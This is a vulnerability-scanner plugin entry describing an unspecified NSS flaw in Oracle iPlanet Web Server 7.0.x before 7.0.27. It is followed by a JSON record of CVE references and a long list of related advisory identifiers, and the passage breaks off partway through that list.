Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)

2018-01-25T00:00:00

Description

According to its self-reported version, the Oracle iPlanet Web Server (formerly known as Sun Java System Web Server) running on the remote host is 7.0.x prior to 7.0.27 Patch 26834070. It is, therefore, affected by an unspecified vulnerability in the Network Security Services (NSS) library with unknown impact.

{"id": "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)", "description": "According to its self-reported version, the Oracle iPlanet Web Server (formerly known as Sun Java System Web Server) running on the remote host is 7.0.x prior to 7.0.27 Patch 26834070. It is, therefore, affected by an unspecified vulnerability in the Network Security Services (NSS) library with unknown impact.", "published": "2018-01-25T00:00:00", "modified": "2023-04-25T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/106349", "reporter": "This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1182", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2564", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2584", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2610", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2179", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2594", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10262", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7940", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2596", "http://www.nessus.org/u?fccabced", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2625", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2595", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2711", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10273", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2713", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2715", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3732", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2601", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798", "http://www.nessus.org/u?ae82f1b1", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2733", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7501", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0635", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10068", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10352"], "cvelist": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2594", "CVE-2018-2595", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2610", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2733"], "immutableFields": [], "lastseen": "2023-05-18T14:23:48", "viewCount": 853, "enchantments": {"dependencies": {"references": [{"type": "aix", "idList": ["OPENSSL_ADVISORY21.ASC"]}, {"type": "altlinux", "idList": ["0653EF8FF93081FDAAAD6A62AD8FC143", "0F5716A274F3E1DB2EDBD5A58776897C", "1DBF0138EA0271447B15B3FF6BEC88C2", "29A30227C72BEB879513AC9D0E0557BF", "2B4F5942EE693DA2DABCA1AEEF4B9716", "2F5BB4D4D211E1FB288B8D2224919136", "419E7F5709487659FE2C94F5A6F4DD82", "523602ADA32D534426305986C8D7BA00", "6E8B796A6FEE95047EFD1F1579BB3755", "849C94248A52E0A8AA02CC14B5BE89EA", "9D1BFD1F5DED4F791BE8B063FE579BF5", "A0E54B696384B2DA588257BEDC733600", "BBD5403B3B956EA3EFD6543AEFF2E749", "BF0DDC573F2D5A313E6E07E02BC91B47", "CA02D996C51FDE4696ED5DEAE9A556FD", "D037F1D5A73BA6F6D6E3391F1C50B295", "D9F68116E5F92212DE7F9C8E8C1305BF", "F4983E5BD264C7DCE81454497ACB4A75"]}, {"type": "amazon", "idList": ["ALAS-2015-618", "ALAS-2016-695", "ALAS-2016-755", "ALAS-2017-896", "ALAS-2017-913", "ALAS-2018-1016", "ALAS-2022-1562", "ALAS2-2018-1004"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-07-01"]}, {"type": "apple", "idList": ["APPLE:08DDC9EE4E7DEBCD387FA33304B8E244", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:HT206903", "APPLE:HT208331"]}, {"type": "archlinux", "idList": ["ASA-201605-3", "ASA-201605-4", "ASA-201609-23", "ASA-201609-24", "ASA-201701-36", "ASA-201701-37", "ASA-201709-15"]}, {"type": "arista", "idList": ["ARISTA:0020"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-64394", "ATLASSIAN:JRASERVER-65102", "ATLASSIAN:JRASERVER-70686", "JRASERVER-64394", "JRASERVER-65102", "JRASERVER-70686"]}, {"type": "attackerkb", "idList": ["AKB:38474044-13DA-4165-A8D4-86867CA68D83", "AKB:CC9CD3C9-B8CC-456B-9B8A-33A1EB9498E9", "AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC", "AKB:FB2F65B2-D10B-4622-AEE6-41AAD3C1E6E7"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}, {"type": "canvas", "idList": ["JBOSS6_JMXINVOKERSERVLET_DESERIALIZE", "WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "centos", "idList": ["CESA-2015:2521", "CESA-2015:2522", "CESA-2015:2671", "CESA-2016:0722", "CESA-2016:0996", "CESA-2016:1940", "CESA-2017:2423", "CESA-2017:2882", "CESA-2017:2972", "CESA-2017:3080", "CESA-2017:3081"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1313", "CPAI-2016-0349", "CPAI-2017-0774", "CPAI-2017-0779", "CPAI-2017-0827", "CPAI-2017-0896", "CPAI-2017-1082", "CPAI-2017-1216"]}, {"type": "cisa", "idList": ["CISA:6A3DB540F84D34B9BB99751624D91DB9"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-12617"]}, {"type": "cisco", "idList": ["CISCO-SA-20160504-OPENSSL", "CISCO-SA-20160927-OPENSSL", "CISCO-SA-20170130-OPENSSL"]}, {"type": "citrix", "idList": ["CTX212736", "CTX233832"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:387B2BBB51760E1FFD4562D4008446F7", "CFOUNDRY:927660022E9A31CE680A6AE3AFF33997", "CFOUNDRY:F006390335E44CFEC69607A8E9BE3B62"]}, {"type": "cve", "idList": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-3738", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2594", "CVE-2018-2595", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2610", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2733"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1102-1:511F7", "DEBIAN:DLA-1102-1:7F277", "DEBIAN:DLA-1166-1:E77EB", "DEBIAN:DLA-361-1:E2323", "DEBIAN:DLA-456-1:BB65D", "DEBIAN:DLA-637-1:F8314", "DEBIAN:DSA-3417-1:682B4", "DEBIAN:DSA-3417-1:D5725", "DEBIAN:DSA-3566-1:D74F5", "DEBIAN:DSA-3673-1:477A4", "DEBIAN:DSA-3980-1:6FBEB", "DEBIAN:DSA-3980-1:C7ED3"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-7501", "DEBIANCVE:CVE-2015-7940", "DEBIANCVE:CVE-2016-2107", "DEBIANCVE:CVE-2016-2179", "DEBIANCVE:CVE-2017-12617", "DEBIANCVE:CVE-2017-3732", "DEBIANCVE:CVE-2017-3738", "DEBIANCVE:CVE-2017-5645", "DEBIANCVE:CVE-2017-9798"]}, {"type": "dsquare", "idList": ["E-627"]}, {"type": "exploitdb", "idList": ["EDB-ID:42745", "EDB-ID:42953", "EDB-ID:42966", "EDB-ID:43008", "EDB-ID:43848"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:28422BD346C315BD9B02E4A18C1B9B0A", "EXPLOITPACK:31B3E3F4C5EABC55DF384007CB11320A", "EXPLOITPACK:65B3837C7995B55CBE45A13A505B8C67", "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "f5", "idList": ["F5:K04403302", "F5:K04734219", "F5:K07538415", "F5:K10105323", "F5:K23173103", "F5:K23512141", "F5:K34681653", "F5:K44512851", "F5:K53173544", "F5:K70084351", "F5:K93600123", "SOL04403302", "SOL07538415", "SOL22071504", "SOL23512141", "SOL93600123"]}, {"type": "fedora", "idList": ["FEDORA:092E9605F081", "FEDORA:0AC1C60C76B5", "FEDORA:341EA6057129", "FEDORA:376506075014", "FEDORA:44719604F0C3", "FEDORA:4B961604A720", "FEDORA:4EA2C604D2D3", "FEDORA:56D376268FDB", "FEDORA:58BAF60A0C7C", "FEDORA:63AEC601CFBA", "FEDORA:6D641613A08A", "FEDORA:6DCC66067328", "FEDORA:76CFD605E21F", "FEDORA:7E8A66075F16", "FEDORA:8830E6049DEB", "FEDORA:97D036078C28", "FEDORA:A3C8D604C8B1", "FEDORA:A7FE360648D0", "FEDORA:A9847604E850", "FEDORA:A99066078F69", "FEDORA:AB2DD6067A04", "FEDORA:D917260C7478", "FEDORA:DB25A6083B5B", "FEDORA:E150A6395ADF", "FEDORA:EFDAB6050C3B"]}, {"type": "fortinet", "idList": ["FG-IR-16-026", "FG-IR-16-048", "FG-IR-17-019", "FG-IR-17-251"]}, {"type": "freebsd", "idList": ["01D729CA-1143-11E6-B55E-B499BAEBFEAF", "43EAA656-80BC-11E6-BF52-B499BAEBFEAF", "76B085E2-9D33-11E7-9260-000C292EE6B8", "C0DAE634-4820-4505-850D-B1C975D0F67D", "D455708A-E3D3-11E6-9940-B499BAEBFEAF"]}, {"type": "freebsd_advisory", "idList": ["FREEBSD_ADVISORY:FREEBSD-SA-16:17.OPENSSL", "FREEBSD_ADVISORY:FREEBSD-SA-16:26.OPENSSL", "FREEBSD_ADVISORY:FREEBSD-SA-17:02.OPENSSL"]}, {"type": "gentoo", "idList": ["GLSA-201612-16", "GLSA-201702-07", "GLSA-201710-32", "GLSA-201802-04"]}, {"type": "github", "idList": ["GHSA-4MV7-CQ75-3QJM", "GHSA-5GGR-MPGW-3MGX", "GHSA-FJQ5-5J5F-MVXH", "GHSA-FXPH-Q3J8-MV87", "GHSA-XJGH-84HX-56C5"]}, {"type": "githubexploit", "idList": ["C2D99D6A-1A8C-5D55-BBB7-34A978AAC642"]}, {"type": "hackerone", "idList": ["H1:136986", "H1:194761", "H1:197253", "H1:269568", "H1:634630"]}, {"type": "httpd", "idList": ["HTTPD:6236A32987BAE49DFBF020477B1278DD", "HTTPD:7DDAAFDB1FD8B2E7FD36ADABA5DB6DAA"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20160706-01-OPENSSL", "HUAWEI-SA-20170322-01-OPENSSL", "HUAWEI-SA-20170503-01-OPENSSL"]}, {"type": "ibm", "idList": ["00420FAFAA8875EA075916FF1CAC2CE1CD7DEB3C678E654BFE5E525386DC980C", "0236273B86DA07DEDD01575B8D7BC09BC4245E7465F644F4852F3C74F78F2689", "025E2CD6F9F010517E9E17E8AC66A53012D7F2D3765B567272ACF4ED02426647", "03180DAB39E0A4D2F6A125A173EDF5A9BB41D6EC602F0BC77B45013371762493", "068E4774F9835C8E080EE324144DDF1D362B4CFF31E92E6F3B859DDEBD2C9E8C", "06DE81C34BCC037C425D4880FEE00C839756BAEBF07AE79D786A78C384E9210B", "06FAF3AD79C8BAC8455C602C3F4C354C0CD9450DE060FB4D831ED000993782B4", "072EBEFE4EF574F4A87AC95BEA1237C43CF6D39DDD94C6BD9B965A322BB8CD15", "0942FB184F4FAEA2A4874C81B33060A84D8FF049E6F0B9FC6D173CD5FE1FF9A9", "0A94A36BE877692B2F0AB97F5081AA5C3010CDF94C05C7E8B0C0AC4E64BEBA67", "0AEC3ABCCFB562437ED4141670F5C7C6E096FEFB11D3045A28046C82B784AD9E", "0BF273789D1B41FCA359A93988125066B51B0DC825C21E4488D80FB61F79560E", "0C0756C600D4B428F9DDC7547681FF909EA01654FA2BE7931EB24F307960FE26", "0CF13F8FB4FD77C6593C265FA8F397D0C4324FC1F07F86C436B4937E98B25DBF", "0DA16010754F6A3A66E6070FF741D701A7AD021EAE93340A6584612005BFDA0C", "0DCB9190AD49CA4A44EED134393F472D4D903648111D70599B707F22E81A5F5B", "0E703A42B01F9DF3E0FEC04EEA4F7733F5A313C86865501C0F8A79378E425C34", "0EB149242AF86C92359FD2819FE5CA2FA94AAA9A6E3A7381956968DD540CEF70", "0EE17D440C828A2F1F3F9C3FDE6036B28E45371AB043D8D00888155801644813", "0F4490A26A7A5960275AF6437143D350A19CD931C617E64E2575EA3E557FDA61", "0F73246124CA58D05064BB5D07082DCA6F2A1D48630CAAC82BCFFB4A71F45CA7", "104BE807C8577FF816DF414B5A588FABB581711BB54758F6F49C7CAC17CD68BE", "107B029DD56A2199A3A87E51461350D452A0422C3E3D25CE9E1B91F71C36131B", "11452E38010E945A0FE01EFC4554F3798D8F99A1582985B386C674085821DFEE", "1148C8DD30AC2930E528C1791D370C73ECDA7CF974AD249EBD19AD99B78AAD68", "12160D8B9DA998BD9B96E21D163BC830E6C209BFFCC664A483A9178521D4B6C0", "12780044E1A62D25F913723FBCBD5B926E91CC9AC8CA8FAA1DCE18D02D152689", "12C657CCB040A2D71F5E7B37692A10A6A4BAA07FBFEAADA8E6F9A5BCFCFD9FAB", "1381DDC2EB11D20FD35FD5133E3BDD2833703D883F98CAA012F0CFBF823F4A6D", "142CC78D456D60E4C1854BC0E93F8802FF4122A7CF6BFD85E457671E02B96A45", "1474F163099BD1C4DB8F70895B954933F28B5580B4DBEFB505E0602EC2A9A7A3", "1736B585D80ED031E004E1AC38E590615C7E0F6FE6AB8A15B1B90CB8EC998277", "1807EADF7EBF2384517F3DB77ADDC9D63E9DD27A36B822C92526AF1341782404", "1815BD265DEB0EE550962E1526DA1FE75BACA3823A20A4BCDA8ED078F9EC9C8D", "1A977E1D46AE4CB4B7068DB341125931FAD75C28D6703503973FFF9BE917887F", "1AE1A5453DE71F54F721615E0361AC5AFC9F69B537244D4EE71AADDF1666ED92", "1B2DCE61952BC751A0A03EA7E17596B9EB37FF0F00BB308BB9D09896E591D7E1", "1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "1C3B18793ACB5388E3C647E0D111B2CBA7FB3EDD55E25DF15A8B98FC47CA05B3", "1C7571B870C8E0F53BD1021F740C140F42C5E17DC0CF9E67A9EA518C91C58FE9", "1D18DE555FB91F29F8BBC3532E15A21A7A5DE61EF8C2DB29C73E6BDCF4F0E604", "1D6C51DC7D1DD9D1A9F07B9737CE12B7F8F933D3089EBCB68A0BBCF75680D250", "1E5AE139B10CF500092EA776D2FBEC36F6F4E6FA4F54A5E7D26647544F0BCEDC", "1E645674D777924BC329B3C0A175ED89181CFB788B28FF3FF2391773A332B20F", "20D9B1C2D3F737956AC381DAF6FF3FD0DC2DEDE18274DB6C07B12D75ED1546A2", "21781046737819F9BECB0172803EAC75FA331A489C94879B0B9D69C572F33FCF", "219D23DAB6D7EED6140DB01019ADA2A19ECEF81B9513870787828621344C3705", "233226C0332001C81596C237819F64BB35F4B49297346F216B4DC90C72D26485", "23F8C1E67922626C0589CA86ED9B40D441D494E8B56CD8FF4A2EF76F18E6861F", "2614071BF8D5B0482694D82BE1651280FCE95089D3BF507FE1CD1ED3591D2446", "2747E3830DAF51B2780DB9863A2F1C153F8615DBA44A0B3E6AC2214663DF92F9", "286378C830B748E29DFAEAB7AC19693EE4565D1CAB6189EAA20A975B835DFAD6", "29036B6FEB00571E2FBC00E867150134E5DF9C08AD44F9670B7C8B0109F99570", "291CDEB3B052F83F4CD9EEB51160C0A1976EEA944AD2E7630096F4DA64D82A76", "2BB93AE1C7A3B73A6491F3A66D7F39AEF96849CFFB0026B650053C816A375F8C", "2C4C30F6AC204024BBD3AF2432B026E0ED887823187122603D99EB1B737069A7", "2C50142AFAF98D1A6DAAE0DCF60AF9902BA861EACEB35AD2405F8E31A1B54456", "2CA5D41818E752F28081A75E5ED108A18F92F75F767B3E9B6E8AB54215538972", "2DD38E427DB50FDA5C4D07F52BDC62BA35206BA44BC185595E39ACAE88DD41C5", "2E9BC1AFBA9F34E20E313BA5B8B5B6C1AEEC0E8F6EC0B353125AA17460789A62", "2EB8A3A34F13FAA08E22E3997DB0F3D1575349656D6F141EC72ED1BF89C93546", "2F4353DF684AD6726CB9491220A703D4AD06D4406D7B35BEBCB2D4EE11863E10", "3048CBA7FDCF53E63595104F24F428E3014DB1EE5B3AE7E450E0E0C06E5736BB", "308A05F5B1028A741D58EC30AC13C7A0A2B660380B87E8811177772F0014DA1B", "30A4A01C549DEF2D2904EB78D4A353DFFF92C9FCE120003D2C0723EC51C85B2A", "30F31D61B76815116E40D478A4FF3D7F4375DE5C3DE9AF0D9789BB84723A1B12", "3165A2AA157F1B9BD1D78DE6275BFF661B98BF29C82399B7216463D7581B8060", "328EA4EC6B75924B9BAF1379828755E57421F5DD51277D579C2833A7289B6F85", "32C5F3A427C23B34350EBCA676883F18871AA834AA2E92920588454B1810F4E9", "33E618FFA988ABAF1F8980465E0C050DDAE38F327AE61E58375E39344D009142", "340A46633C57BC64A513C7574F7A78D6AB2EB22FC581AFEB2E64A95AF1A94932", "35774A12657731256610BEB1ACB2AE99C105060354AA560F82DED28AE65A8B24", "35F9A813F05B327D07BF7368CED622D5E23B4D9BCBE752850A037D89EB6C0A00", "362D62C684CC4EC1C14D4239144C432AC6F62E6231DC7416F6DEB9B4ED0F1853", "366FA55EE0B09B40AABB041DB433F5E49FC0E42F7988440387EBE3EED9DBAE91", "374411ADB66A6B6C60B3EE4DE9977ADF2AE7482BB4DDC9927957858BCCD39B02", "381B76F53A26572A7C476380F44421473D669346B3F00F995B318188F2D2B793", "399718E68B1AC921F1F63310793CB30CE98BCB15C409BBB99985FB5BE97A027F", "39CAE5EE9A0F3DE219E28E6A3BE90E3B8E089FF2AA4C74E8BE3A4E2714716AC5", "39D4A3024CD82E0AB1412C8F0B7DE6C9C896CC59E99FBAB7A5A61175586A3211", "3C34CA137D675C01FA30FF52E4840DE4F8835BDD73CFE7BE14C18869DE46A7B2", "3C630E87CC8A98E980FC5838CF94096C676B99FA65014F79A0F1057053EEB9E0", "3CFF13ADA1D4912594BB3AC9D0D9ACB17881A208B1AD8998A1E8BD64DD6C5268", "3D12006C995C2C683E173419369377B400C7252133E8CFEEEC83E09104078893", "3D737E91C4B3785D05EA6B518DF81A98A3D897F7446C9E2969F3A9E22A7F3BF4", "3D8540513E9389E52505EF4CCF99C1FC5DC8928BFA49128170D48087D1264725", "3DAB255772B5C0465CD2A50FC27BF93D482025FE8D7247F3C147E19AC9F9AFD2", "3DF4EFFCBD4398CD9D2C6995C59DEC9020B7665B1A75D2B23F0CFA94C34BBB8A", "3E3AF8AC7BA63076BEE8FFB670B3A3F27E0903C83526E54496E50EB2DF74B875", "3E4520A9DDDBF10F6B94F393C5ACDA44738184D5CB46AB64AABDC963283BECFE", "3F02DA1DC04A6C658BCF965E5FB3FFCC64EB1D7D66FB0A8038636EF62D559250", "3F69F1D0D10816FD8495E0C83E350D2B9E6780C77327A103789FDAA73BA20599", "3F80F1C5995CB0E287AB72B1E8BF8C924AB58095FF03363465C1CD78E76837BF", "3F87B04299510DB46305863338E9A0F1914960F422CD52BBCEFC7A8547CEF17D", "4045CCD240F2B35A8601219CE94DB09C4D73D63425EC22F9B94DF9CFAD2D1890", "411DE209066A00259E38D292C22264C2EDA3B961B523920D589433F42FB534BC", "4250B3DD6EE0328D9C74AEF40742DE820FA06152EBCCE27DF8DD34DE016AB4B9", "4278728D85C79F2084FC36711DAAF10C86E475C8E6940F2111DD155F1C48C0FA", "4337F9AE4A5A2285A37D88E12A5DAC941D106D987FD93F7005C756BEB07720F5", "43D6A9E05A4CC6A06B189CA54AC124E51768DDF9C5BF0CCD807BBC3420EEFF39", "43F04716E6B0E2BF698B22EF7A50C437F4D7B8FF87A1F35A7A342FA2BFEC87F6", "440F021094DE35C6A13F9FADEA7C56D6B4093B16EFDEAEC496EC398C5AC7A327", "449F34AAD10DD9765AEBD2663CC16B31AA5D35B533E921970DCB2DD9DF361C47", "462CCAEFE39DE4B8C89C00328CBC9CA234F0066E30424E0C8AE6BA1EF9AA8903", "46799FCDE18E3EFD375868A79B70BC4BEDEC133C2495D8AA8CF81D91E7DEF01A", "46D4B9F92B3C18E29E5C7BBEC13D92B5ECA31B1A6E3BE57749375938FC2B3CBC", "470FB53E20DCF01D3FF4FB7251C5868A5D215FF7480131C88B1F5C06E159D01A", "4904478758E68B5AAF1019EF051EFDC11A110285B2C9609A3BF862A4F48B7806", "4B148567EC90382B0050CCDE54A9B83A43198C92EC9BE9CFC73EDF1EA73C84B9", "4B97D587ED0EB00F691EC8B1DEAE11012A90D1363A87AB9E90AA9B29B0236141", "4C38766283CEE338D5C512A76FE766520F818C766B10B8F6096918C93D2A8A67", "4C3B655997B1B90D55D74A5668CC31D928F2F462E891BF5BEB27CAD7295489D4", "4C800D760232A012AE25AED7F8AFCFF9E3EF3D9D48D3614E764CC6588F221519", "4C98F5463E3FBB67682E7F864F699DD4A99514832D6E44999F6672401F35C8B0", "4DCD65078718A8D516F2EEE878B45FE5D131D6C4D4010E935F3E6A750A6D9BB3", "4E95B5EB959CBE5490B90287812FD445A690A3158E83D37882EADCE4A7BCD44F", "4FD47AEA2F5CB5889B57E92B9DC421BD8EAFD564DE765D5E28E9C751B5921C33", "50C63CAB6CE7C82879629075DBEC583B457D2B0B2841FC0D9A8D67A25B64EB25", "50D29823D1F18CC1FB9A002BD0994315DDFA79FE8E446748A193B22689C93A82", "52978310171C7824FCB3D7F95C69EBF1D6E27BF67B6F66BA0F589002F4898E20", "52A5398094130E1B0A40291225AFDAF806D3B8B80AD7F16F186739DA6E836335", "55525A5AB54D0FA4DF8FA8BD6DC8E03E586A11FBFBE9E5EA61E7B15171D0178E", "55C6EB16408836E84C4255320770BC4F60934779CE325008D25B4951C20115C1", "55DACA18AFE52B9657ED6763ECD6310E15A2B6AF470F5EA9C7BA6E971FD15B5B", "5641564DE1A4B9249AC0EED2F265EE204961C428F093EC99321D93DA0AA23C3E", "5711509DD871227FC9F7CD530DA0E06F21DDA1D522E7B1C76AC95D3AD5F6BC07", "57A11B587849D0E11C412236D22F7BCF16F25A1EFBAC8A9A8B6F2723A64C8C41", "57CBD94F97013E208754F9AF764D3D11B1DD38D12A2436EA761D2BBFEB325C9A", "58C9C23A20C5D55610ECFF1953DA7C91CDE42118EE0F8DBDBF1D696C4A948D37", "591E98996DBAEC8DA2E30D3261AADF9BF750C358714362A5B9B9F30A1AC23AB8", "59AFB6B22B3D21FAFDC933DA29973F4C6887013B5320E839F5B0B140E8DDA7D1", "5A5125564C5E6100B8631DC69D64BB29F15CFE14C3E6A31A6DF6AD6E3808314A", "5A8825AD62C7A9668D229174BBF47E909FDDC63BC31C38BE196932E629C1F298", "5B0D973A3FED1AF2D6DC61C906D27DFB052F1D42B4263EA8695D5ECC3E5F9F09", "5B4C19B2CA9D2714AEF1546FC810D709406148AD04288568A5EFCF5FDEF9B2D5", "5B61A8C776F5DB5A9AF0C13607CB60BA8EAB34C3208154E6FCEAAD0857CCDCEA", "615E4369D0B07E7BA358AF447BD05A3ACC0720A255109ADB57E2A2080DB3607A", "62DB70FCF6301104005FF9FB20C71886DC177ADAE354920858B0940C223989CD", "637F608901EF8B9FD34455682320A8EBC1B665D4F6B5C7F53F3E57AE66C9AAAA", "6390A51C827FA9826D05D6F22A5DB62BFFC9752CF836C6B898D5F5BEA5C44130", "63DAB7532D89108F5D2DC3FDE381EF3F537B4BD859941C18E4BAD485F5223BE3", "65DC12D6E8E0D53E6ED0AF1F356647C749F500509AAE6E4435FC95F00517F01C", "6858032AD0022691AF88FEDCEF29BB4CEA50172EAD995CAB6463B91C16637C1C", "68620709627EAD066E865897A856617556047C7100878749E07A6C6B5831EB59", "68E7DB3D7E398B2706226213F9B1A94ACD374A065EE9538BCE2CF140B065CB08", "691466DAEE06683E49687F1AD61B1DE274EE44CA9F6E86B9BF8D7D76D6346999", "699A1ED7C203BD1C8BA3FC9BCD0A95A9618D0B3B3F0BC3CD80DE6C86C31C5E44", "6A2E92D36FABC1D54E354DFAE40C5959271B5DD0561E7165A41D0F6CCD6A7B7C", "6AB5B24B612744A794E7F28CC88F04C811F4BB9710FE31917EFCB65EDDDF7C9A", "6CDA9CBBD4E668C70A53BD4F7D7CDE00CF73C49E1D8C5300C858682BFBB02BCB", "6D1266D7512253D04698EC2DEB85B8BF906B1F2E64F7EABD217D462B19E8EBEC", "6DB274E6F7EB4D6F538135EC07CF4443980A5C2FC8C1652E16833E39D5F430D2", "6DF0EA7261F9FFCCA1E31883D543E424844ABBF09168C7312068557779B50C94", "6F2C088BF5D78FB804760981ACFE38C9CC104BC5F9390812E5D324682512AD45", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "71A473993D401FAFDA20A063C958EB3785E06B0F2833BBEB5FA0B1E2E3123139", "72D44C997959DC41BF81F871ABB53A98AEBA00944ABE8FEF404373839D0746E6", "72ECA624F1897E880B20E3BA243FE78C6A66224FD180FE337A72D958F8C9A7F0", "73288A84B49A641505C576DEDC995F44E69001C227078E86112664767072BDA2", "73AC0A21A1C1C6C3987AD6559B838B31C02E7FC2112C00D32E18ABA3B130AC8F", "757B616252D9C5ECF905DFAC8032FBD7AB4A8DAEFD48C0BADFE2734A2E87D1AE", "75AE9D4CB9FE02C082FC4424DBD420EA2EAC4CD4BCE0C4E376DC8DEE1119F8D3", "762617D611F88A799B689B6B3E1C033FD35BF7C43760B0AEF360F438F510D1B0", "76415522829E96D2199B1D5D63817545B42CAE7C008B9902D48D11CAEE020C66", "765EE754DDB2AFC25A4F81B453619E8DE782835F4B2ACED4DF8CE43B5D4C10B8", "773DDD02D33CA887669E403873832C97214FE7479EC22378C819CABAB56A0F98", "78B5CDD949B0594AC0F181656CB6536E0B075D4B064576C915C9BFAF10028314", "7923A025A42A3181B25C4E17D1720C6EC0A32E05B6C7523890E596B2A6F11E31", "79C9308A38227EABEE316B0407CBC46021561F829AEBF9659F93085D4FC63547", "7A811732B34C1BAA3F2209EA69EE01FCACF762E53C22EAE8A8FB7A45B4E7164D", "7B7FB00293A8F53E25D4A2A19DB3E7DD5613C6E483518C6A9ED7EE3CF79E76F5", "7B9AB0004B19C07C7509F6BC5712ECB9A1222E830E184DC0464DF75AF70587EF", "7BD03C97D3450FEAE4EB4F8F33140691B9F85B4915C83AFD5212FE881A12ADDA", "7C371350C79C6F7596054D8B19A4BAAD069A8ADE699FB847B44E70E03F3D6988", "7C630DEEF9C025461097DE30AF143B45E948D8E848AEF027D365F38629529B0E", "7CF53FE09C7D25161BFAD59060E2F4269BC90C0B892337805721A0FE0A9BDA22", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E4E851053AF5C2BFADF66AC8494971BF986538EB9E1BEE4C5D8B83D2DB1BBB0", "7E5316C696B18FF3DFF87CA859F82C9C66CB155243A7620FC742BE55816A9D9C", "7FE72ED4C858FD4F010CC95764D03AAC86CD4C73FE6C4B388FE981C9E76DD0F6", "820B1DD869225ABFDEEE5645C1D3A0F396BA3FC9E77C88E3D91F1C4FC0D9B8E3", "8215E02FB88590F4B93468E9B3C6A2785DF30F06545A788005F8AA267BB66470", "825B52995DBE90672BBA09CCFBDD51925814B984495E8E740D466D1C921FE61C", "82D348B7AC274B1F17A78CC906F5DDC3A5C96BD23F4BB13600CC22F46FFF3EFD", "8325E2E8632F22E10CD653162D8EFC2BD56BD809EC2298B08EF585D287E1CFA8", "8451DCEAC7362310C8EAA923574AFEAD09CA58D139A870AE0ED1E3D11764573B", "8575D8248B9DA38940B8C0CCB82D1E07AFCED1CC97BE2C46A21CC51F08DEC7BC", "8585A81D2C6357431DB37ADDF4189DBBFAC913BE555A9B6483BF16E8E8705C85", 